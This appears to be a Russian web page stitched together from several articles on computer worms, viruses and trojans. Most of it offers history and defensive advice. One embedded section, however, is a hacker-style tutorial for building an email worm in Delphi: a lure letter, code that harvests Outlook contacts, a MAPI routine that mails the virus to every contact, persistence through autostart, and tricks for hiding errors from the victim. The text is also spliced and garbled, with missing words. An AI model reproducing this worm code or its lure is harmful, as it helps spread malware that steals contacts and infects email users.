Тарифы Услуги Сим-карты

Компьютерные черви. Вирусы, черви, трояны

Они представляют из себя специфический, особый тип вирусов. Средой существования обычных зловред является файловая система, а черви попадают на наши устройства через сеть. К тому же попасть в ПК они могут не только посредством электронной почты или интернета, им подвластны и другие Поэтому темой этой статьи и являются сетевые черви и защита от них. Ведь они проникают и через сети операторов мобильной сети, и локальные LAN-сети, и IRC-сети для чатов, и сети P2P, предназначенные для прямого обмена файлами между пользователями напрямую, и сети служб, используемых для обмена мгновенными сообщениями.

Немного из истории сетевых червей

Первая информация об их действии появилась в 1978 году. Йон Хупп и Джон Шоч, программисты компании Ксерокс, задались вопросом о сборе и обработке информации со всех компьютеров на один, центральный. Через какое-то время каждый ПК компании, обработав нужный объем работы, передавал результат программе, которую написали наши программисты, а она, все время находясь в локальной сети, обработав данные, отправляла их на центральный компьютер. Совсем быстро друзья потеряли контроль над своей программой и долго не могли понять в чем дело.

Появился неконтролируемый траффик, затем была заблокирована вся сеть. Исследовав проблему, программисты и обнаружили разновидность вирусов, которые и получили название вирусы сетевые. Компьютерные пользователи старшего возраста должны также помнить w32.Blaster.worm - червя, который заражал Windows от 2000 до XP и не пускал в интернет, перезагружая компьютер. В ноябре 1988 года получил известность “Червь Морриса”, заразивший 10% всех мировых компьютеров из-за небольшой ошибки автора кода. Целую недели эти ПК не функционировали, нанеся ущерб порядка 100 миллионов долларов. Поэтому такая тема, как сетевые черви и защита от них, очень важная и ее значимость со временем только увеличивается.

Типы сетевых червей и их пути в компьютер

Какие же задачи у этих зловред? Второстепенные - проникнуть в ваше устройство, активироваться в нем и начать размножаться, но уже не только в вашем ПК. Отсюда и основная задача - через сеть обязательно пролезть в устройства других людей. Какие же они есть, их типы? Основная часть этого особого вируса - почтовые черви, попадающие в компьютер с файлом, прикрепленным к электронному письму. Пользователь сам его и активирует, пытаясь открыть. Особо это относится к неопытным компьютерщикам, которые не замечают ничего подозрительного в расширении запускаемого файла, так как часто видно только ложное.

Поэтому всегда нужно выполнять старую рекомендацию - не реагировать на письма от неизвестных людей. Активировавшись, вирусы сетевые находят на устройстве электронные адреса и отправляют им копию себя любимого. Подобным способом черви “расползаются” и через IRC-клиенты, и ICQ, и другие подобные мессенджеры. Иногда они проникают в ПК из-за брешей в операционной системе, программном обеспечении и браузерах. Есть и другие виды сетевых червей: IRC-черви, P2P-черви и IM-черви. Думаем, уже с названий понятно, чем они занимаются и как попадают в ПК.

Другие задачи сетевых червей и их признаки на компьютере

Их принцип действия схож с деятельностью некоторого другого вредоносного ПО, например, Выполнив свою основную задачу, они начинают выполнять другие задачи. Среди них: установка программ для управления (удаленного) зараженным компьютером, воровство данных, их уничтожение, то есть все то, на что их запрограммировал создатель.

Но даже без этих дополнительных действий на устройстве увеличивается объем траффика, падает производительность, нагружаются каналы связи. Это и является явным признаком наличия червя в системе. Если блокируется работа антивируса, то это еще один факт, на который нужно обратить внимание. Может даже быть заблокирован доступ к сайтам антивирусного ПО.

Как же защищаться от сетевых червей?

Мы с вами достаточно хорошо рассмотрели первую часть выражения - сетевые черви и защита от них, теперь приступим ко второй. Хотим сразу же предупредить, что обычный антивирус, имеющий базовый функционал, особо вам не поможет, в лучшем случае выявит сам факт угрозы и заблокирует ее. Но это не помешает очередной компании зловред лезть к вам через сеть снова. Но если ваш ПК подключен к сети, хороший антивирус - необходимое условие его работы.

Защита от сетевых червей входит и в функционал самой операционной системы. Она обладает инструментами для этого, которые, как минимум, значительно снижают риски заражения. Основной из них - автоматическое обновление ОС и активированный файервол/брандмауэр. В пиратских сборках это часто отключено, что чревато серьезными проблемами. Ведь именно файервол проверяет все данные, поступающие на компьютер сети, и решает, пропускать их или нет.

Сторонняя защита от сетевых червей

Для того чтобы усилить защиту компьютера от сетевых червей, хакерских червей и других вирусов, рекомендуется установить в качестве альтернативного решения брандмауэр стороннего разработчика. Такие программы, благодаря более узкой направленности, имеют более гибкие настройки. У пользователей популярностью пользуются: Comodo Firewall - полностью бесплатное ПО и Outpost Firewall Pro - платное.

Для того чтобы быть постоянно в куре всех новинок борьбы с новой “заразой”, советуем обратиться к ресурсу viruslist ru. Сетевые черви там все наперечет, появление новых отслеживается, и вы сразу же об этом узнаете. Кстати, помимо известных антивирусов, черви блокируют доступ и к ресурсу VirusInfo, который имеет сервис для бесплатного лечения устройств от различных инфекций.

Выводы

Кратко совместим в нескольких предложениях весь жизненный цикл развития сетевых червей:

  1. Проникновение в вашу систему.
  2. Важный пункт - активация.
  3. Поиск потенциальных жертв.
  4. Производство и подготовка копий.

Дальнейшее распространений копий.

Теперь делайте выводы. Надеемся, что вы уже хорошо поняли, что такое сетевые черви, и защита от них реальна на самом первом этапе. Тогда не будет никаких проблем. Так что защищайте свой компьютер от проникновения угрозы, и не придется затем тратить много усилий на борьбу с последствиями.

Сегодня я опишу тебе принцип работы сетевого вируса. Тема, как ты понял, весьма актуальная, поскольку 70% лично моего ящика всегда бывает забита вирусами самого разного пошиба
— от мелких, но злобных VBS-червей до полуторамеговых произведений младших школьников 🙂 Они-то ведь не знают про существование WinAPI 🙂

Для проникновения на компьютер вирусы могут либо использовать баги в ПО юзера (VBS+Outlook= love:)) либо- баги в голове самого юзера. Рассмотрим пример такого вирусного письма:

Subj: Прикол
Привет! Держи крутой прикол, который я тебе (или не тебе, не помню:)) Обещал. Но все равно держи. Не бойся, по-настоящему он ничего не форматирует!
Проверить не забудь, параноик 🙂
Успехов!
Attach: fake_format.exe

Ну так вот: каждый ламероватый интернетчик посылает своим друзьям приколы постоянно, и, соответственно, не очень-то помнит, кому чего обещал; сообщение о «ненастоящем форматировании» переключает мозги жертвы в русло приколов, а слепая вера в антивирусы
— добивает 🙂 Напомню — описанные мной алгоритмы не определяются никакими webами, avp и другими бойцами.

Короче, мне самому уже захотелось запустить этот веселенький прикол. Запускаю 🙂

Error… intel pentium 5 not found!

Ой.. Вроде как не работает? Не, не угадал 🙂 На самом деле вирус тут же перенес свое тело на хард к жертве, записался в автозагрузку, и теперь будет тусоваться в оперативочке (хинт: на медицинском жаргоне «оперативка»- это ОПЕРАТИВНАЯ ХИРУРГИЯ, так что будь осторожен;)) жертвы по принципу, описанному мной в статье «резидентный вирус своими руками». Только вот проверять он будет не запуск файлов, а подключение к сети интернет 🙂 (в исходнике это будет процедура IsOnline, так, на будущее;)). Впрочем, одновременно
мониторить запуск файлов тебе никто не мешает
— это все-таки вирус, хоть и сетевик. Поэтому в логику я включу процедуру InfectFile. Таким образом, мы будем использовать следующие функции и процедуры:

ISONLINE — проверка соединения с инетом
SENDVIRUS — догадайся с трех раз 😉
GETMAILS — получаем адреса из AddresBook аутглюка
INFECTFILES — 🙂
WORKMEMORY — почти то же, что в прошлой статье, но с модификациями.

КОДИНГ

До начала собственно кодига на этот раз необходимы будут долгие предварительные ласки 🙂 Объясняю почему: для чтения адресной книги мы будем обращаться к аутлуку по межпрограммному интерфейсу, а для этого нам нехило поиметь его type library. Вот и делай: projectа import type library, и ищи там…правильно, Outlook express v.9 или какой там у тебя стоит. Девятой считается версия, если не ошибаюсь, из Office2k. Импортировал? Что значит «нет в списке»? Да ладно, бывает. Ищи вручную
— в каталоге с офисом есть файл msoutl.olb. Это она 😉 Теперь в раздел uses пиши outlook_tlb и будешь иметь доступ к самым интимным местам адресной книги 🙂 Ой, какой-то я сегодня озабоченный 😉
В общем, процедура потрошения адресбука должна выглядеть как:

uses
ComObj, outlook_tlb,
Forms;
….
Procedure GETMAILS;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s: string;
num, i: Integer;
mails: array of string;

begin
MSOutlook:= CreateOleObject(‘Outlook.Application’);
MyNameSpace:= MSOutlook.GetNameSpace(‘MAPI’);
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength (mails,MyFilder.Items.Count);
for i:= 1 to MyFolder.Items.Count do
begin
MyItem:= MyFolder.Items[i];
mails[i]:= myitem.email1addres;
end;

Ну как, порадовало тебя написанное? Гы, дальше будет только хуже. Потому что отправка вируса будет на чистом API. А это, как говорит Horrific: «то же самое, что ручной секс. Эффект есть в обоих случаях, но его приходится долго добиваться и нет такого кайфа» 🙂 Ну
так что я тут понаписал? Uses Comobj позволяет нам работать с COM технологией; далее мы только создаем OLE объект аутлука, и циклически выясняем у него список емайлов. Если тебе хочется выяснить еще что-нибудь
— это тоже реально, читай доки — они рулез. Хоть и на английском. Список емайлов пишется в динамический массив из строчек. Его будет юзать функция SendVirus. Вот эта:

function SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i: integer;
s: string;
begin
with MapiRecipDesc do begin
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= nil;
end;

with MapiFileDesc do begin
ulReserved:= 0;
flFlags:= 0;
nPosition:= 0;
lpszPathName:= PChar(Attachment);
lpszFileName:= nil;
lpFileType:= nil;
end;

with MapiMessage do begin
ulReserved:= 0;
lpszSubject:= nil;
lpszNoteText:= PChar(Subject);
lpszMessageType:= nil;
lpszDateReceived:= nil;
lpszConversationID:= nil;
flFlags:= 0;
lpOriginator:= nil;
nRecipCount:= 1;
lpRecips:= @MapiRecipDesc;
if length(Attachment) > 0 then begin
nFileCount:= 1;
lpFiles:= @MapiFileDesc;
end else begin
nFileCount:= 0;
lpFiles:= nil;
end;
end;

Result:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
or MAPI_LOGON_UI or MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
end;

Ты не опух, пока это читал? Пойди, попей пивка, а то ничего не поймешь.
Выпил? Я тоже 😉 Хорошо, продолжаем. Юзать будешь так:

For i:= 1 to length (mails) do
begin
SendVirus (»,mails[i],’pricol’,’..’);
end;

Здесь мы задействуем функции uses MAPI, поэтому не забудь его объявить. Короче, это
— низкоуровневая работа с почтой. А для работы с почтой, как ты знаешь, надо иметь а)
email получателя б) текст письма в) аттач. Вот я и делаю:
MapiRecipDesc — описываю получателя, MapiFileDesc — аттач,
т.е. наш вирус, MapiMessage — это сообщение, потом я его командой MapiSendMail отправлю в большую жизнь 😉 Ну, не так это оказалось и сложно. Главное понять, что твой самый большой друг
— это не c:\porno, а win32.hlp 🙂

Как же теперь все это словоблудие уложить в суровую логику вируса? Сам разберешься, я тебе уже 2 статьи подряд об этом долблю. И вообще, я вчера отмечал день рождения моей девушки, теперь у меня слегка трещит голова 🙂 Ну ладно, чувство долга сильнее. Just Do It:
первой строчкой проверяешь имя файла, откуда ты стартовал. Если
pricol.exe — значит CopyFile к виндам 🙂 А если стартанул из виндового каталога
— то циклически проверяй подключение к всемирной 😉 сети. Проверяем:

function IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
begin
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Result:= (Res = 0) and (dwCount > 0);
end;

Так. Если все путем, то вперед — тряси адресную книгу и рассылайся. Тут есть две хитрости. Если твое имя
pricol.exe — незамедлительно проверяй соединение. Возможно, пользователь проверяет почту в онлайне. Так наши шансы на рассылку сильно возрастут. До второй хитрости ты уже допер сам,
а именно, при описанном мной раскладе ты будешь все время отправлять одному и тому же юзеру одинаковые письма, только потому, что его не стерли из адресбука. Следовательно, все отработанные адреса записывай в логфайл и постоянно с ним сверяйся. Вроде бы все. Хотя нет. Не забывай ошибкоопасные фрагменты кода заключать в try..except. И ставить ключ {$D-}. Потому что если юзер вдруг поймает ошибку в духе «‘FUCK’ is not valid integer value», он что-то да заподозрит.

ЗАКЛЮЧЕНИЕ

Эта последняя статья про вирусы, отлаженные под windows 9x. Недавно я форматнул винт, и поставил WindowsXP Professional, поэтому следующие примеры будут уже под него. А ты уже можешь потихоньку покупать Delphi 7, поскольку я свои шестые где-то посеял, и сейчас сижу вообще голый 🙂 Покупать буду, соответственно, седьмые 😉

Следующая статья, наверное будет посвящена стеганографии и ее практической реализации.

Инструкция

Вирусы-черви – это вредоносные программы, которые самостоятельно распространяются по интернету, сменным носителям, папкам, файлам, заражая при этом основные типы документов. У них могут быть различные цели, изначально поставленные создателем. Как правило, не опытные пользователи постоянно сталкиваются с проблемами или заражения информации. Чтобы избежать этого, установите специализированное антивирусное программное обеспечение на свой компьютер.

Как правило, таких программ существует большое количество. Их можно скачать в интернете, купить диски в магазинах, заказать почтой. Это зависит только от вашего желания. Однако стоит заметить, что нужно устанавливать лицензионные программы, которые во время обновляют базы вирусных сигнатур и проверяют всю систему компьютера без ограничений.

Установка такой программы не займет много времени. Если вы уже купили диск, вставьте его в привод компьютера. Далее перед вами появится окно с приветствием от компании. Найдите надпись, типа «Установка» или что-то подобное. Далее выберите каталог установки на вашем . Как правило, такие программы нужно устанавливать в системный локальный диск компьютера. Как только установка закончится, вам нужно будет нажат на кнопку «Готово» и перезагрузить компьютер.

Далее откройте программу и произведите полное сканирование компьютера. Антивирусное программное обеспечение обязательно найдет вредоносные программы, если такие присутствуют в системе. Старайтесь проводить сканирование хотя бы два раза в неделю и обновлять базы вирусных сигнатур. Для этого требуется активное подключение к интернету. Если вам действительно дороги все данные , не экономьте на защите компьютера, чтобы в последующем не жалеть об этом.

Сетевой червь является разновидностью вредоносных программ. Его можно «подцепить» на компьютер, посещая различные интернет-ресурсы. Одним из основных признаков сетевого червя является блокировка антивирусной программы, а также невозможность посетить официальные сайты разработчиков антивирусного программного обеспечения. Это крайне неприятное вредоносное ПО. И конечно же, при первых симптомах заражения компьютера данным вирусом нужно предпринять меры, чтобы от него избавиться.

Вам понадобится

  • - компьютер;
  • - утилита KKiller;
  • - утилита доктора Зайцева.

Инструкция

Для удаления сетевого червя вам понадобится утилита KKiller. Она абсолютно бесплатная. Скачайте программку из интернета. Распакуйте архив с ней в любую папку. Инсталлировать утилиту не требуется, ее можно запустить прямо из папки. Если к вашему компьютеру подключены флеш-накопители, то следует извлечь их. Также отключите на время антивирусную программу.

После этого запустите программку KKiller. Она начнет сканирование персонального компьютера. Утилита заблокирует активное заражение файлов, просканирует оперативную память ПК, а также очистит системный реестр. Во время процесса сканирования никаких других операций на компьютере лучше не совершать. Когда сканирование будет завершено, то в окне будет написано «Нажмите любую клавишу». Соответственно, это и нужно сделать. После этого обязательно совершите перезагрузку ПК.

Следующая антивирусная программа, которая поможет решить проблему, называется утилита доктора Зайцева. Она также является бесплатной. Найдите ее в интернете, скачайте и распакуйте в любую папку. Эта утилита также не нуждается в установке. Запустите ее.

В основном меню программы найдите раздел «Методика лечения». В нем снимите флажок напротив строки «Выполнять лечение». Далее в этом же меню нажмите «Файл», после чего выберите «Запустить сканирование». Теперь вам необходимо дождаться завершения процесса сканирования. Его результаты отображаются в протоколе. Отчет о результате будет представлен в самом низу этого протокола. Если утилите удастся обнаружить сетевого червя, то он будет удален из вашей системы.

Видео по теме

Троян (троянский конь) – разновидность вируса, более опасная, чем иные распространенные вредоносные программы-черви. Трояны обычно маскируются под безобидные приложения, но, на самом деле, они имеют крайне враждебные функции.

Инструкция

Как же происходит заражение трояном? Ничего не подозревающий юзер из сети Интернет якобы полезную программу и запускает ее. После запуска нередко появляется сообщение об ошибке или что-то подобное. "Что ж, видимо, скачал битую программу. Надо ее", - думает незадачливый пользователь, но уже трояном, который благополучно отсылает злоумышленнику-мошеннику, обосновывающемуся в ПК, что позволяет ему прослеживать все действия пользователя. Таким образом, мошенники обычно крадут личную информацию пользователей, а также их и используют потом в своих целях. При скачивании из опасайтесь неизвестных производителей.

Видео по теме

Полезный совет

Источники:

  • как удалить троян с компьютера в 2019

К сожалению, скорее всего, не осталось интернет-пользователей, которые тем или иным образом не встречались с таким явлением, как компьютерные вирусы . Черви, вредоносные программы, трояны и другая живность в огромном количестве перемещается в глобальной сети от компьютера к компьютеру. Что стоит предпринять, если вы наткнулись на такого вируса в сети? Об этом наша инструкция.

Инструкция

Свяжитесь с администрацией ресурса, на портале которого вы обнаружили . Проще всего представителям электронное письмо с детальной инструкцией, где и при каких обстоятельствах был найден вирус. Если ваш антивирус уже опознал его, облегчите работу владельцам сайта - назовите имя, которые присвоено вирусу. Это ускорит процесс его идентификации на портале.

В основном, все люди называют любой вид вредоносного программного обеспечения как «Компьютерный вирус», но на самом деле это не совсем так. Существует множество видов вредоносных программ, в том числе вирусы, трояны и черви, и у каждого вида свое поведение и распространяются они тоже по разному.

Вместо названия «компьютерные вирусы» правильнее использовать «вредоносные программы», т.к. компьютерный вирус — это просто еще один вид вредоносного ПО, такой же как троян или червь. Так что если хотите общий термин для нежелательных и плохих программ то используйте слово вредоносные программы. А вот антивирусных программ не волнует как называется и какого вида вредоносное ПО — они могут удалить троянов, вирусов, червей и других видов вредоносных программ. Но в этой статье речь не пойдет об антивирусных программах, мы вам расскажем об основных видах вредоносных программ, а именно, что такое вирус, троян и черви, а также в чем между ними разница.

Компьютерный вирус заражает другие файлы и программы, подобно тому, как биологический вирус заражает живые клетки. В большинстве случает вирусы заражают файлы с расширением.exe, так что сами по себе, просто находясь в памяти жесткого диска, вирусы не могут заражать другие файлы, а только тогда когда запускается.exe файл с вирусом. Проще говоря если вы откроете.exe файл содержащий вирус, то только тогда вирус начнет распространяться.

Некоторые типы компьютерных вирусов способны заразить также другие типы файлов, такие как макросы в Word или Excel документы. Такие вирусы могут распространяться через вложенные файлы электронной почты, съемные устройства хранения данных или через сетевые папки.

Компьютерные вирусы могут устроить полный хаос в вашей системе. В некоторых случаях они могут заменить существующие программные файлы полностью на себя, а не как обычно как дополнительный файл к существующим файлам. Это означает, вирус удаляет все файлы, тем самым объявив о своем присутствии. Также вирусы могут занимать системную память, вызывая сбои системы.

Вирусы являются очень опасными, т.к. они очень быстро распространяются.

Что такое компьютерные черви?

Червь (по анг. Worms) — это самостоятельная программа, которая распространяется без участия пользователя. Если вирусы распространяются с помощью самих же пользователей, то черви делают это самостоятельно. Но они не заражают другие файлы, вместо этого они создают и распространяют копии самих же себя.

Некоторые черви, например, печально известный червь Mydoom, который заразил более полумиллиона компьютеров по всему миру распространяет свои копии через электронные письма. А другие не менее опасные и быстро распространяющиеся черви, такие как Blaster и Sasser используют сетевые уязвимости, вместо использования электронных писем. Они путешествуют по сети и заражают устаревшие и уязвимые системы в которых нет брандмауера.

Черви, которые распространяются по сети, могут генерировать большое количество трафика, замедляя при этом сеть. А после того, как он попадет в систему, он можете выполнять те же действия что и вредоносный вирус.

Что такое Троян?

Трояны названы в честь мифологического троянского коня. Чтобы покорить Трою, греки соорудили огромного деревянного коня и подарили его троянцам в качестве подарка. Троянцы приняли подарок в свой город. Позже, той ночью из деревянного коня вышли греческие воины и открыли ворота города — а что за этим последовало, вы можете себе представить.

Троянский конь — это примерно то же самое в компьютере. Трянский конь маскируется под полезные программы, т.е. выдает себя как нормальную и полезную программу, к примеру, такие программы как, руссификаторы, генераторы ключей и т.д. Попав в вашу систему, троян открывает бэкдор в вашей системе т.е. лазейку (уязвимость).

Затем, автор этого трояна будет использовать эту лазейку для своих целей. Например, он может использовать ваше интернет соединение для незаконных действий, которые в итоге будут указывать только на вас. Или для загрузки других вредоносных программ, в общем, через этот черный ход автор трояна может сделать все что угодно.

Другие угрозы

Существуют и другие типы вредоносных программ, вот некоторые из них:

  • Шпионские программы (Spyware) — это такие вредоносные программы, которые будут следить за вашими действиями на компьютере. К примеру, «Кейлоггеры» (клавиатурные шпионы), могут запомнить те клавиши или комбинации клавиш, которых вы нажали и отправить своему создателю. Они могут украсть информацию вашей кредитной карты, пароль от онлайн банкинга и т.д. Шпионские программы созданы для того, чтобы принести деньги своему создателю.

  • Scareware — также известный как мошенническое ПО. В основном они появляются как поддельное антивирусное оповещение на веб-странице. Если поверить оповещению и загрузить поддельную антивирусную программу, то после загрузки программа сообщит вам о наличии вирусов в вашей системе и запросит номер кредитной карты или будет настаивать на оплате, чтобы программа удалила вирусы. Программа будет держать вашу систему в заложниках, пока вы не оплатите или удалите программу.

Всегда обновляйте вашу операционную систему и другие программы на вашем компьютере, также всегда имейте антивирусную программу, чтобы защитить себя от такого рода опасностей.

Остались ли у вас вопросы по теме компьютерные вирусы, трояны и другие виды вредоносного ПО? Оставьте комментарий и мы ответим на любые интересующие вас вопросы.

Заражение компьютера вредоносными программами – проблема, с которой время от времени сталкивается любой пользователь, подключенный к сети Интернет и копирующий данные с внешних носителей. Подобного рода «инфекция» может прийти как угодно, если компьютер по какой-то причине недостаточно защищен. Знание особенностей различных программ, дестабилизирующих систему ПК, поможет вовремя их обнаружить и быстро от них избавиться.

Что общего у зараженного компьютера с больным человеком?

Известно, что человек чаще всего заболевает под воздействием вирусов – такого рода инфекция поражает конкретный орган или систему и ослабляет организм, поражая его клетки. Вирус в некотором роде питается клетками человека – и примерно так же ведет себя вредоносная компьютерная программа: она захватывает и «съедает» файлы, вписываясь в их программный код. Пораженные вирусом клетки отмирают, а испорченные файлы компьютера не подлежат восстановлению.

И вирусы, и черви имеет целью дестабилизировать работу одного компьютера или целой сети. Вот несколько наиболее распространенных способов передачи такой «заразы»:

  1. По электронной почте, если открыть письмо с подозрительным вложением.
  2. Открыв ссылку на сомнительный сайт (такие ссылки часто попадаются на различных ресурсах «для взрослых»).
  3. В файлообменных сетях.
  4. На драйвере ОС.

Компьютерный вирус как опасная игрушка

Этот тип деструктивных программ поначалу был безобидным – их создатели придумали вирусы… для игры. По ее условиям, вирусы рассылались друзьям, чтобы посмотреть, как много собственных копий может сделать такая программа. Тот игрок, которому удавалось целиком заполнить чужой компьютер, объявлялся победителем. Но затем вирусы стали создавать с деструктивными целями, а именно – уничтожение данных на компьютере и постепенное выведение из строя операционной системы.

После того как вирус проник на компьютер, должна произойти его активация – для этого зараженный объект должен получить управление. В связи с этим различают два типа вирусов:

  1. Загрузочные (захватывают секторы постоянных и сменных носителей).
  2. Файловые (захватывают файлы).

Активировавшись, вирус ищет похожие объекты. Например, файловый вирус «съедает» один документ Word и продолжает переходить на другие документы, пока не уничтожит их подчистую – или не будет выявлен.

Отметим, что вирусы имеют довольно ограниченную специализацию – если они рассчитаны на какой-то один тип файлов, то они будут заражать подобные объекты. Также вирусы могут создавать для определенных ОС: например, вредоносная программа, написанная для Windows, не будет действовать на Linux.

Сетевые черви: пожиратели памяти

Если компьютер без видимых причин вдруг начал «тормозить», отдельные программы медленно запускаются, а система часто зависает, то, скорее всего, она заражена сетевым червем, который сумел обойти систему защиты или воспользовался какой-то лазейкой в ОС.

В отличие от вируса, червь не интересуется данными и никак не задевает файлы : он просто размножается, копируя самого себя и заполняя свободное место на диске. В случае несвоевременного обнаружения червя, подвиснуть может компьютерная сеть целой организации, так как эта вредоносная программа питается памятью. Кроме того, червь может вытягивать много трафика в интернете.

Как уберечься от вирусов и червей?

Самый действенный способ обезопасить свой компьютер от сетевой «заразы» – установить легальную и дорогую систему защиты, которая будет блокировать любые опасные программы при их попытке проникнуть в ОС.
Но поскольку фантазии хакеров нет предела и они постоянно плодят новых вирусов и червей, нацеленных на игнорирование защиты, нужно помнить об элементарных правилах:

  • Не открывать письма от неизвестных отправителей со странными темами и вложенными файлами с расширением.exe.
  • Пользоваться надежными почтовыми системами, которые сами фильтруют подозрительные сообщения.
  • Отказаться от скачивания нелегального контента на сомнительных сайтах.
  • Быть осторожными с торрентами.
  • Дополнительно проверять съемные носители, которые подключаются к вашему компьютеру.

Эти несложные правила помогут вам уберечь свой компьютер от нежелательных программ.